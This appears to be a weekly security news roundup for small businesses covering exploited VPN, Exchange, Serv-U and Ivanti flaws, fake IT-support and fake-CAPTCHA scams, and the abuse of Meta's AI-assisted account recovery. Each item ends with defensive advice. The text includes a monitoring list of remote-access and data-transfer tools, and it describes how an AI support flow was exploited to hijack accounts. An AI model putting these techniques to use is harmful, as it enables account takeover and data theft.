Cyber News: Week Ending June 13, 2026

This week’s cybersecurity news has a clear theme: attackers are going after the trusted paths people and businesses use every day. They are targeting VPNs, remote access gateways, Exchange servers, file-transfer systems, support workflows, browser prompts, and account recovery tools.

For individuals and small businesses, the issue is not just “another patch week.” These are the systems that connect remote workers, move customer files, protect email, recover social accounts, and help employees get IT support. When those trust paths fail, attackers can bypass passwords, steal files, hijack accounts, or convince someone to run malware themselves.

Here’s what happened, why it matters, and what you need to do about it.

1: Check Point VPN Flaw Was Exploited to Bypass Passwords

CISA added CVE-2026-50751 to its Known Exploited Vulnerabilities catalog on June 8 after active exploitation of a critical Check Point VPN flaw. The vulnerability affects Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol, and it can allow an unauthenticated remote attacker to establish a VPN connection without a valid user password.

SecurityWeek reported that the flaw carries a CVSS score of 9.3 and has been exploited in the wild as a zero-day. Check Point observed exploitation dating back to May 7, with increased activity in early June, and at least one confirmed attack tied to a Qilin ransomware affiliate.

This matters because VPNs are a front door into business networks. If attackers can bypass the password step and establish a VPN session, they may be able to move toward file shares, servers, remote desktops, and administrator tools. Even if more steps are needed after the VPN connection, the first barrier has already failed.

BET-R Actions: If you use Check Point VPN or firewall products, ask your IT provider whether IKEv1 is enabled for remote access and whether the hotfix has been applied. Disable deprecated VPN protocols where possible, require machine certificates, review VPN logs for unfamiliar sessions, and check for indicators of compromise from Check Point. Do not assume MFA alone solves this specific issue because the reported flaw can bypass password authentication at the VPN layer.

2. Microsoft’s June Patch Release Includes Exchange and Windows Issues Small Businesses Should Not Ignore

Microsoft’s June 2026 Patch Tuesday addressed roughly 200 vulnerabilities across Windows, Azure, Office, Outlook, Exchange, and AI tools. SecurityWeek reported that nearly 40 of the flaws were rated critical, and three publicly disclosed issues were assessed by Microsoft as “exploitation more likely.”

Microsoft also patched CVE-2026-42897, an actively exploited Exchange Server vulnerability affecting Exchange Server 2016, Exchange Server 2019, and Exchange Server Subscription Edition. BleepingComputer reported that the flaw can allow attackers to execute arbitrary JavaScript in cross-site scripting attacks targeting Outlook Web Access users, and Microsoft advised administrators to install the June 2026 Exchange security updates as soon as possible while keeping mitigations in place.

This matters for small businesses because patching Windows workstations is only part of the job. If your organization still runs on-premises Exchange, remote email access is a high-value target. If you use Windows devices with BitLocker, privilege escalation, or web server exposure, the June patch cycle also deserves attention.

BET-R Actions: Apply June 2026 Microsoft security updates across Windows endpoints and servers. If you run on-premises Exchange, prioritize the Exchange update immediately and confirm the Exchange Emergency Mitigation Service remains active. If you outsource IT, ask for written confirmation of which systems were patched, which failed, and which require reboots or maintenance windows. For laptops, verify BitLocker recovery key storage and do not skip reboot prompts after security updates.

3. SolarWinds Serv-U and Ivanti Sentry Show Why Admin Interfaces Should Not Be Exposed

CISA warned that attackers are exploiting CVE-2026-28318 in SolarWinds Serv-U, a file-transfer product used by organizations to move business data. SecurityWeek reported that unauthenticated attackers can exploit the flaw with specially crafted POST requests containing the Content-Encoding: deflate header to crash the Serv-U service. SolarWinds fixed the issue in Serv-U 15.5.4 Hotfix 1, and CISA urged federal agencies to patch by June 19.

CISA also added CVE-2026-10520, a maximum-severity Ivanti Sentry OS command injection vulnerability, to its exploited vulnerabilities catalog after honeypot exploitation attempts were observed. SecurityWeek reported that the flaw can allow remote, unauthenticated attackers to execute code with root privileges if vulnerable management interfaces are exposed, and Ivanti emphasized that the management port 8443 should never be internet-facing.

The lesson is simple: file-transfer systems, mobile gateways, and management interfaces are not “set it and forget it” systems. They often sit near sensitive data and privileged access, which makes them attractive to attackers.

BET-R Actions: Inventory file-transfer services, MDM gateways, VPN portals, RMM tools, firewalls, and administrative web portals. Remove direct internet exposure for management interfaces wherever possible. Patch SolarWinds Serv-U to 15.5.4 Hotfix 1 or later if affected. Patch Ivanti Sentry to the fixed versions and restrict access to port 8443. Add monitoring for service crashes, unexpected admin logins, new administrator accounts, and unusual file-transfer activity

4. Silent Ransom Group Keeps Targeting Businesses Through Fake IT Support

BleepingComputer reported on June 7 that Silent Ransom Group, also tracked as UNC3753, Luna Moth, and Chatty Spider, is targeting U.S. law firms and professional services organizations through social engineering that often leads to data theft within hours. The attacks commonly begin with invoice-themed emails from consumer email accounts, followed by phone calls from people impersonating corporate IT staff.

Attackers convince victims to join remote support sessions through tools such as Microsoft Teams, Zoom, Quick Assist, Microsoft Terminal Services, AnyDesk, Zoho Assist, Bomgar, or SuperOps. They then search document management platforms and cloud repositories for contracts, tax records, Social Security numbers, merger and acquisition files, client records, and financial documents. Ransom demands can arrive within 30 minutes of the attackers leaving the victim environment, with threats to contact employees and clients directly.

This is high-impact for small businesses because it does not require a fancy exploit. A convincing phone call, a fake help desk domain, and a rushed employee can be enough.

BET-R Actions: Create a hard rule that IT support must be verified through a known number, ticketing system, or internal channel before any remote session starts. Block or restrict unauthorized remote-access tools. Train employees not to install support software from links sent in chats, emails, or private notes. Monitor for new installs of AnyDesk, Zoho Assist, Quick Assist, Rclone, WinSCP, and other remote or transfer tools. Restrict USB storage and review cloud storage access to sensitive client documents.

5. FTC Warns Fake CAPTCHA Prompts Are Installing Malware

The FTC warned about a phishing scam that looks like a normal CAPTCHA but tricks users into running commands on their own device. The fake prompt may tell users to press Windows + R, then Ctrl + V, then Enter. Instead of proving the user is human, the steps paste and run hidden malware.

This is dangerous because it abuses a familiar pattern. People are used to proving they are not robots, and attackers are using that muscle memory to bypass suspicion. A real CAPTCHA may ask you to select images, type letters, or solve a basic verification challenge. A real CAPTCHA will not ask you to run commands on your computer.

For individuals and small businesses, the risk includes stolen email logins, banking credentials, browser data, and account access. If this happens on a business workstation, the malware may expose company email, cloud apps, saved passwords, or client data.

BET-R Actions: Train users that any CAPTCHA asking for keyboard shortcuts, command prompts, PowerShell, Terminal, or pasted commands is malicious. If someone follows the steps, disconnect the device from the internet, preserve evidence, run endpoint security scans, and change passwords from a different trusted device. Enable two-factor authentication, but remember that stolen browser sessions can still be dangerous. Add browser and endpoint protections that block known malicious script execution where possible.

6. Meta AI Support Abuse Shows Account Recovery Can Become an Attack Path

Meta disclosed that 20,225 Instagram users had accounts hijacked after attackers abused Meta’s AI-powered High Touch Support account recovery system. BleepingComputer reported that the support flow did not properly verify whether a password reset email address matched the email address already associated with the targeted Instagram account. Attackers could receive reset links at attacker-controlled addresses and take over accounts that did not have two-factor authentication enabled.

Potentially exposed account data included email addresses, phone numbers, dates of birth, posts, photos, videos, stories, direct messages, profile information, account activity, and linked services. Meta disabled the affected support system and password reset links, enrolled potentially stolen accounts into security checkpoints, and required reauthentication.

This matters to small businesses because Instagram and Facebook accounts are business assets. A hijacked account can be used to scam customers, damage a brand, redirect payments, run fake promotions, steal ad account access, or impersonate a business owner.

BET-R Actions: Turn on two-factor authentication for business social media accounts and use authenticator apps or hardware keys where possible. Keep account recovery emails and phone numbers current. Limit who has admin access to Facebook, Instagram, Google Business Profile, LinkedIn, and ad accounts. Document recovery procedures before an account is hijacked. Review connected apps, ad payment methods, business managers, and delegated account access at least monthly.

Recent Incidents This Week
The following organizations and systems were impacted by security incidents this week:

Check Point VPN exploitation: CVE-2026-50751 was exploited to establish VPN sessions without valid passwords in vulnerable IKEv1 remote-access configurations.
What this means for you: VPN protocol settings and hotfix status need immediate review.
Microsoft June Patch Tuesday: Microsoft fixed roughly 200 vulnerabilities, including critical issues across Windows, Azure, Office, Outlook, Exchange, and AI tools.
What this means for you: this is not a routine “patch whenever” month; prioritize exposed servers, Exchange, and endpoints.
Exchange Server exploited issue: CVE-2026-42897 affects Exchange Server 2016, 2019, and Subscription Edition, and can target Outlook Web Access users.
What this means for you: if you still run on-premises Exchange, patch and keep mitigations enabled.
SolarWinds Serv-U exploitation: CVE-2026-28318 can let unauthenticated attackers crash vulnerable Serv-U file-transfer services.
What this means for you: file-transfer systems need hotfixes, monitoring, and exposure review.
Ivanti Sentry management exposure: CVE-2026-10520 can allow root-level code execution when vulnerable interfaces are exposed.
What this means for you: management ports should not be internet-facing.
Meta AI support account hijack: More than 20,000 Instagram accounts were hijacked through an AI-assisted account recovery flaw.
What this means for you: social media recovery controls are part of business security.

How Individuals and Small Businesses Can Respond
Here’s what you can do this week to strengthen your security posture:

Patch exposed systems first: Prioritize VPNs, firewalls, Exchange, file-transfer tools, MDM gateways, remote-management tools, and public admin panels.
Disable old remote-access protocols: Review IKEv1, legacy VPN clients, old cipher settings, and any exception that keeps outdated access alive.
Keep management interfaces private: Port 8443, appliance admin portals, router logins, RMM dashboards, and file-transfer consoles should be restricted to trusted networks or VPN-only access.
Verify IT support requests: Require employees to confirm remote support through a known internal process before installing tools or granting screen access.
Treat fake CAPTCHAs as malware attempts: No legitimate CAPTCHA should ask users to open Run, paste commands, or launch PowerShell, Terminal, or Command Prompt.
Secure social accounts like business assets: Enable two-factor authentication, limit admins, document recovery steps, and review connected apps and ad payment settings.
Watch for follow-up phishing: Breached accounts, stolen social access, and fake IT calls often lead to more believable scams afterward.
Document patch status: Keep a simple record of what was updated, when, what failed, and who verified it.
Review logs after urgent patches: Do not just patch and move on. Check whether the vulnerable service was accessed before the fix.
Practice the first hour of response: Know who can isolate a device, revoke sessions, reset passwords, contact clients, preserve logs, and call outside help.

The main takeaway this week is that attackers are not only breaking into systems. They are abusing the processes people already trust: VPN login, support chats, password recovery, CAPTCHA prompts, file transfers, and remote IT sessions.

Break that trust chain. Patch what is exposed, verify who is asking for access, keep admin tools private, and give employees permission to pause before they click, install, approve, or run anything unexpected.